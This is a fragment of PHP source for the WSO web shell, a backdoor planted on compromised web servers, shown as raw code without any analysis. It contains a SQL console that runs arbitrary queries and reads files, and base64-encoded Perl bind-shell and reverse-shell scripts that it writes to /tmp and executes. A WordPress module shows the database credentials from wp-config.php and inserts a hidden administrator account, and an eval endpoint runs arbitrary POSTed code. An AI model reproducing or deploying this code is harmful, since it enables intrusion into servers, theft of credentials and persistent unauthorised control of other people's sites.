";$tmp="";if(isset($_POST['sql_host'])){if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])){switch($_POST['charset']){case "Windows-1251": $db->setCharset('cp1251');break;case "UTF-8": $db->setCharset('utf8');break;case "KOI8-R": $db->setCharset('koi8r');break;case "KOI8-U": $db->setCharset('koi8u');break;case "cp866": $db->setCharset('cp866');break;}$db->listDbs();echo "';}else echo $tmp;}else echo $tmp;echo " count the number of rows
";if(isset($db)&& $db->link){echo "
";if(!empty($_POST['sql_base'])){$db->selectdb($_POST['sql_base']);echo "";}echo "
Tables:

";$tbls_res=$db->listTables();while($item=$db->fetch($tbls_res)){list($key, $value)= each($item);if(!empty($_POST['sql_count']))$n=$db->fetch($db->query('SELECT COUNT(*)as n FROM ' . $value . ''));$value=htmlspecialchars($value);echo " " . $value . "" .(empty($_POST['sql_count'])? ' ':" ({$n['n']})"). "
";}echo "
File path:		";if(@$_POST['p1']=='select'){$_POST['p1']='query';$_POST['p3']=$_POST['p3'] ? $_POST['p3']:1;$db->query('SELECT COUNT(*)as n FROM ' . $_POST['p2']);$num=$db->fetch();$pages=ceil($num['n'] / 30);echo "" . $_POST['p2'] . "({$num['n']} records)Page # ";echo " of $pages";if($_POST['p3'] > 1)echo " < Prev";if($_POST['p3'] < $pages)echo " Next >";$_POST['p3']--;if($_POST['type']=='pgsql')$_POST['p2']='SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' .($_POST['p3'] * 30);else $_POST['p2']='SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' .($_POST['p3'] * 30). ',30';echo "

";}if((@$_POST['p1']=='query')&& !empty($_POST['p2'])){$db->query(@$_POST['p2']);if($db->res !== false){$title=false;echo '';$line=1;while($item=$db->fetch()){if(!$title){echo '';foreach($item as $key=>$value)echo '';reset($item);$title=true;echo '';$line=2;}echo '';$line=$line==1 ? 2:1;foreach($item as $key=>$value){if($value==null)echo '';else echo '';}echo '';}echo '
' . $key . '
null' . nl2br(htmlspecialchars($value)). '
';}else {echo '
Error: ' . htmlspecialchars($db->error()). '
';}}echo "

";echo "

";if($_POST['type']=='mysql'){$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`)= USER()AND `File_priv`='y'");if($db->fetch())echo "
Load file
";}if(@$_POST['p1']=='loadfile'){$file=$db->loadFile($_POST['p2']);echo '
' . htmlspecialchars($file['file']). '
';}}else {echo htmlspecialchars($db->error());}echo '
';_wss7();}function actionNetwork(){_wss3();$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";echo "

Network tools

Bind port to /bin/sh [perl]
Port:
Back-connect [perl]
Server: Port:

";if(isset($_POST['p1'])){function cf($f, $t){$w=@fopen($f, "w")or @function_exists('file_put_contents');if($w){@fwrite($w, @base64_decode($t));@fclose($w);}}if($_POST['p1']=='bpp'){cf("/tmp/bp.pl", $bind_port_p);$out=wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");sleep(1);echo "
$out\n" . wsoEx("ps aux | grep bp.pl"). "
";unlink("/tmp/bp.pl");}if($_POST['p1']=='bcp'){cf("/tmp/bc.pl", $back_connect_p);$out=wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");sleep(1);echo "
$out\n" . wsoEx("ps aux | grep bc.pl"). "
";unlink("/tmp/bc.pl");}}echo '
';_wss7();}function actionWP(){global $wpdb, $DB_HOST, $DB_USER, $DB_PASSWORD, $DB_NAME,$DB_PREFIX, $wpconfig, $wpdir, $plugdir;_wss3();if(!$wpconfig){echo "Wordpress not found"; return;}$co=file_get_contents($wpconfig);if(preg_match_all('!define\s*\(\s*\'*([A-Za-z_]+)\'*\s*,\s*[\'"](.+?)[\'"]\s*\);!', $co, $r, PREG_SET_ORDER)){foreach($r as $k)$wpp[$k[1]]=$k[2];}if(preg_match('!\$table_prefix\s*=\s*[\'"](.+?)[\'"]\s*;!', $co, $r)){$wpp['DB_PREFIX']=$r[1];}extract($wpp);list($DB_HOST,$DB_PORT)= split(':', $DB_HOST); if(!$DB_PORT)$DB_PORT=3306;$wpdb=new mysqli($DB_HOST, $DB_USER, $DB_PASSWORD, $DB_NAME, $DB_PORT);function getone($q){global $wpdb;if($res=$wpdb->query($q)){$a=$res->fetch_array(MYSQLI_NUM);$res->free();return $a[0];}}$wpdir=str_replace("\\", "/", pathinfo($wpconfig, PATHINFO_DIRNAME));$plugdir="$wpdir/wp-content/plugins";$verbuf=file_get_contents("$wpdir/wp-includes/version.php");if($verbuf && preg_match('!\$wp_version\s*=\s*\'(.+?)\';!msi', $verbuf, $o)){$wp_version=$o[1];}$pluginz=array();if($plugd=@opendir($plugdir)){while(($file=readdir($plugd))!==false){if($file[0]=='.')continue;if(is_dir("$plugdir/$file")){if($psd=@opendir("$plugdir/$file")){while(($subfile=readdir($psd))!==false){if($subfile[0]!= '.' && substr($subfile, -4)=='.php')$pluginz[]="$file/$subfile";}closedir($psd);}}else{if(substr($file, -4)== '.php')$pluginz[]=$file;}}closedir($plugd);}foreach($pluginz as $pz){if(!is_readable($pf="$plugdir/$pz"))continue;if(preg_match('!/\*(.+?)\*/!msi',file_get_contents($pf),$o)){if(preg_match_all('!^\W*?([\w\s]+?):\s+(.+?)$!msi',$o[1],$t,PREG_SET_ORDER)){foreach($t as $y){if(($pm=trim(strtolower($y[1])))=='plugin name' && $y[2]){$plugz[]=$pz;}$plugx[$pz][$pm]=$y[2];}}}}if(mysqli_connect_error()){$error=1;}else{$wpurl=getone("select option_value from ${DB_PREFIX}options where option_name='siteurl'");$wpname=getone("select option_value from ${DB_PREFIX}options where option_name='blogname'");$posts=getone("select count(*)from ${DB_PREFIX}posts where post_status='publish' and post_type='post'");$pages=getone("select count(*)from ${DB_PREFIX}posts where post_status='publish' and post_type='page'");$users=getone("select count(*)from ${DB_PREFIX}users");$plugins=unserialize(getone("select option_value from ${DB_PREFIX}options where option_name='active_plugins'"));if('delplug'==$_POST['p1'] && $_POST['p2']){$g=urldecode($_POST['p2']);if(in_array($g, $plugz)){echo "Plugin $g was ";if(in_array($g, $plugins)){$new=array();foreach($plugins as $p){if($p!=$g)$new[]=$p;}$plugins=$new;echo "deactivated";}else{$plugins[]=$g;echo "activated";}$wpdb->query("update ${DB_PREFIX}options set option_value='".$wpdb->real_escape_string(serialize($plugins))."' where option_name='active_plugins'");}}elseif('adduser'==$_POST['p1']){function add_user($login,$password,$email=''){global $wpdb, $DB_PREFIX, $wpdir;include_once "$wpdir/wp-includes/class-phpass.php";$wp_hasher=new PasswordHash(8, true);$hp=$wp_hasher->HashPassword( trim( $password));$dt=date("Y-m-d H:i:00", time()- 3600*24*360);if(!$email)$email="admin.$login@googlemail.com";$login=$wpdb->real_escape_string($login);$password=$wpdb->real_escape_string($password);$email=$wpdb->real_escape_string($email);$q="insert into {$DB_PREFIX}users SET user_login='$login', user_pass='$hp', user_email='$email', user_registered='$dt', user_status=0, display_name='$login'";if($wpdb->query($q)=== TRUE){$user_id=$wpdb->insert_id; $q="INSERT INTO ${DB_PREFIX}usermeta SET user_id=$user_id, meta_key='${DB_PREFIX}user_level', meta_value= '10'";if($wpdb->query($q)=== TRUE){$q="INSERT INTO ${DB_PREFIX}usermeta SET user_id=$user_id, meta_key='${DB_PREFIX}capabilities', meta_value= 'a:1:{s:13:\"administrator\";b:1;}'";return $wpdb->query($q)=== true ? $user_id:false;}else echo "2: $wpdb->error\n";} else echo "1: $wpdb->error\n";}list($uu,$up,$ue)= explode('|', $_POST['p2']); if(!$uu){$burl=preg_replace('!^([^\.]+)\..+$!', '$1', preg_replace('!^(ww.?|dev)\.!', '', $uh=parse_url($wpurl, PHP_URL_HOST)));$uu="{$burl}adm";$up="$burl";$ue="$uu@$uh";$uskip=1;}if($uu && $up && !$uskip){$exists=getone("select ID from {$DB_PREFIX}users where user_login='".$wpdb->real_escape_string($uu)."'");if(!$exists){$uid=add_user($uu,$up,$ue);echo "User $uu sucessfully added!";}else{echo "User $uu already exists";}echo "
";}}}echo "";echo "

Wordpress info

WP Version: $wp_version [ Manage ] [ SQL ]
WP Dir: $wpdir
WP Config: $wpconfig
WP Site URL: $wpurl
Blog Name: $wpname
HostUserPasswordDatabaseUsersPostsPagesPlugins
$DB_HOST$DB_USER$DB_PASSWORD$DB_NAME$users$posts$pages".count($plugins)."
";if($error){echo 'Connect Error('.mysqli_connect_errno().')'.mysqli_connect_error(); return;}if($plugz){echo "

Wordpress plugins

";foreach($plugz as $plug){$act=in_array($plug, $plugins);if($act)$plugx[$plug]['plugin name']='' . $plugx[$plug]['plugin name'] . '';$vv=$plugx[$plug]['version'];if($plugx[$plug]['plugin uri'])$vv="$vv";echo "
[»] * " . htmlspecialchars($plug). "{$plugx[$plug]['plugin name']}$vv";}echo "
";}echo "

Add wordpress admin

UsernamePasswordEmail
";_wss7();}function actionRC(){if(!@$_POST['p1']){$a=array("uname"=>php_uname(),"php_version"=>phpversion(),"wso_version"=>WSO_VERSION,"safemode"=>@ini_get('safe_mode'));echo serialize($a);}else {eval($_POST['p1']);}}if(empty($_POST['a']))if(isset($default_action)&& function_exists('action' . $default_action))$_POST['a']=$default_action;else $_POST['a']='SecInfo';if(!empty($_POST['a'])&& function_exists('action' . $_POST['a']))call_user_func('action' . $_POST['a']);exit;